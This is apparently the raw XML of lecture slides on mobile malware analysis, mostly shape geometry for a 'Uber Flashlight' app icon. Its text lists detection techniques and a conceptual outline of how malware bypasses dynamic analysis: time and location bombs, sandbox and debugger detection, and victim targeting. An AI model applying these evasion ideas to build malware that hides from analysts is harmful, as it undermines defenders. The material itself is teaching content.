              <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
              <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
              <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
              <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
              <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
              <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
              <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
              <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
              <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
              <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
              <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
              <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
              <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
              <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
              <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
              <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
              <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
              <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
              <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
              <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
              <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
              <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
              <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
              <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
              <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
              <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
              <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
              <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
              <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
              <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
              <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
              <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
              <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
              <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
              <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
              <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
              <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
              <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
              <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
              <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
              <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
              <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
              <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
              <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
              <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
              <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
              <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
              <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
              <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
              <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
              <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                <a:moveTo>
                  <a:pt x="42588" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="506602" y="2"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="740755" y="2"/>
                  <a:pt x="1277648" y="184693"/>
                  <a:pt x="1277648" y="412520"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1277648" y="640347"/>
                  <a:pt x="740755" y="825038"/>
                  <a:pt x="506602" y="825038"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="42585" y="825036"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-10810" y="550025"/>
                  <a:pt x="-17482" y="248315"/>
                  <a:pt x="42588" y="1"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="42000">
                <a:schemeClr val="bg1">
                  <a:alpha val="51000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="59000">
                <a:schemeClr val="bg1">
                  <a:alpha val="3200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  <a:effectLst>
            <a:glow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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1442742" y="3786043"/>
            <a:ext cx="480561" cy="1191153"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
              <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
              <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
              <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
              <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
              <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
              <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                <a:moveTo>
                  <a:pt x="0" y="30034"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="160187" y="-10012"/>
                  <a:pt x="320374" y="-10012"/>
                  <a:pt x="480561" y="30034"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="480561" y="1104621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1104621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3003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>
            <a:glow rad="508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Stored Data 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1602792" y="2734485"/>
            <a:ext cx="160460" cy="825038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3093 w 11426"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
              <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
              <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
              <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
              <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
              <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
              <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
              <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
              <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
              <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
              <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY6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426" h="10000">
                <a:moveTo>
                  <a:pt x="3093" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11426" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10505" y="0"/>
                  <a:pt x="8333" y="2239"/>
                  <a:pt x="8333" y="5000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8333" y="7761"/>
                  <a:pt x="10505" y="10000"/>
                  <a:pt x="11426" y="10000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3093" y="10000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2172" y="10000"/>
                  <a:pt x="0" y="7761"/>
                  <a:pt x="0" y="5000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2239"/>
                  <a:pt x="2172" y="0"/>
                  <a:pt x="3093" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:pattFill prst="narVert">
            <a:fgClr>
              <a:schemeClr val="tx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Stored Data 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1602792" y="2734484"/>
            <a:ext cx="160460" cy="825038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3093 w 11426"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
              <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
              <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
              <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
              <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
              <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
              <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
              <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
              <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
              <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
              <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
              <a:gd name="connsiteY6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426" h="10000">
                <a:moveTo>
                  <a:pt x="3093" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11426" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10505" y="0"/>
                  <a:pt x="8333" y="2239"/>
                  <a:pt x="8333" y="5000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8333" y="7761"/>
                  <a:pt x="10505" y="10000"/>
                  <a:pt x="11426" y="10000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3093" y="10000"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2172" y="10000"/>
                  <a:pt x="0" y="7761"/>
                  <a:pt x="0" y="5000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2239"/>
                  <a:pt x="2172" y="0"/>
                  <a:pt x="3093" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="94000">
                <a:srgbClr val="1D1D1D">
                  <a:alpha val="16000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="5000">
                <a:srgbClr val="131313">
                  <a:alpha val="60000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="50500">
                <a:srgbClr val="262626"/>
              </a:gs>
              <a:gs pos="42000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                  <a:alpha val="93000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="59000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx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>
          <a:xfrm>
            <a:off x="1278440" y="3042194"/>
            <a:ext cx="809164" cy="33019"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
              <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
              <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
              <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
              <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
              <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
              <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
              <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
              <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
              <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
              <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
              <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
              <a:gd name="connsiteY2" fmla="*/ 24102 h 24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4799" h="24102">
                <a:moveTo>
                  <a:pt x="0" y="24102"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="140163" y="7416"/>
                  <a:pt x="266842" y="0"/>
                  <a:pt x="404308" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="541774" y="0"/>
                  <a:pt x="824799" y="24102"/>
                  <a:pt x="824799" y="24102"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1512582" y="3786043"/>
            <a:ext cx="340880" cy="1191153"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
              <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
              <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
              <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
              <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
              <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
              <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
              <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
              <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                <a:moveTo>
                  <a:pt x="0" y="30034"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="160187" y="-10012"/>
                  <a:pt x="320374" y="-10012"/>
                  <a:pt x="480561" y="30034"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="480561" y="1104621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1104621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30034"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="50500">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="19000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="42000">
                <a:schemeClr val="bg1">
                  <a:alpha val="27000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="59000">
                <a:schemeClr val="bg1">
                  <a:alpha val="23000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="10800000" scaled="0"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow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20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1553531" y="4004110"/>
            <a:ext cx="258982" cy="601579"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29055"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="0"/>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d extrusionH="76200" contourW="38100">
            <a:bevelT w="139700" h="139700" prst="divot"/>
            <a:extrusionClr>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:extrusionClr>
            <a:contourClr>
              <a:schemeClr val="tx1">
                <a:lumMod val="85000"/>
                <a:lumOff val="1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>
            <a:off x="1574793" y="4060453"/>
            <a:ext cx="216458" cy="260072"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 26999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scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d extrusionH="76200" contourW="12700">
            <a:bevelT w="50800" h="139700" prst="divot"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:extrusionClr>
            <a:contourClr>
              <a:schemeClr val="tx1">
                <a:lumMod val="85000"/>
                <a:lumOff val="1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3863" y="1313333"/>
            <a:ext cx="2198318" cy="227805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591283" y="1467375"/>
            <a:ext cx="2185416" cy="173011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="49000">
                <a:srgbClr val="232323"/>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="dk1">
                  <a:satMod val="103000"/>
                  <a:lumMod val="102000"/>
                  <a:tint val="94000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="dk1">
                  <a:satMod val="110000"/>
                  <a:lumMod val="100000"/>
                  <a:shade val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk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/>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="5400000" algn="t" rotWithShape="0">
              <a:schemeClr val="bg1">
                <a:alpha val="40000"/>
              </a:scheme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45720" rtlCol="0" anchor="ctr">
            <a:sp3d extrusionH="6350">
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1" smtClean="0"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Helvetica Neue Condensed" charset="0"/>
                <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                <a:cs typeface="Helvetica Neue Condensed" charset="0"/>
              </a:rPr>
              <a:t>Uber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0"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Helvetica Neue Condensed" charset="0"/>
                <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                <a:cs typeface="Helvetica Neue Condensed" charset="0"/>
              </a:rPr>
              <a:t> Flashlight</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0"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Helvetica Neue Condensed" charset="0"/>
              <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
              <a:cs typeface="Helvetica Neue Condensed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05606" y="616358"/>
            <a:ext cx="7763008" cy="331545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052605" y="1313333"/>
            <a:ext cx="2749960" cy="1422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Identification techniques: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Network activity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D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ebugging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I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nstrumentation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E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1895298" y="2958353"/>
            <a:ext cx="1746601" cy="1143001"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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8681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1.11111E-6 L 2.22222E-6 0.03079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52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  <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0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Bypassing Dynamic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9740" y="1421679"/>
            <a:ext cx="8423385" cy="4952227"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure the malicious code is not executed during the analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Time bombs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Location bombs, IP bombs, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sandbox detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is the contact list full and “real”?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same for meetings, emails, accounts, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Am I running in a debugger? [Anti debugging]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Targeted attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trick the detection module</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
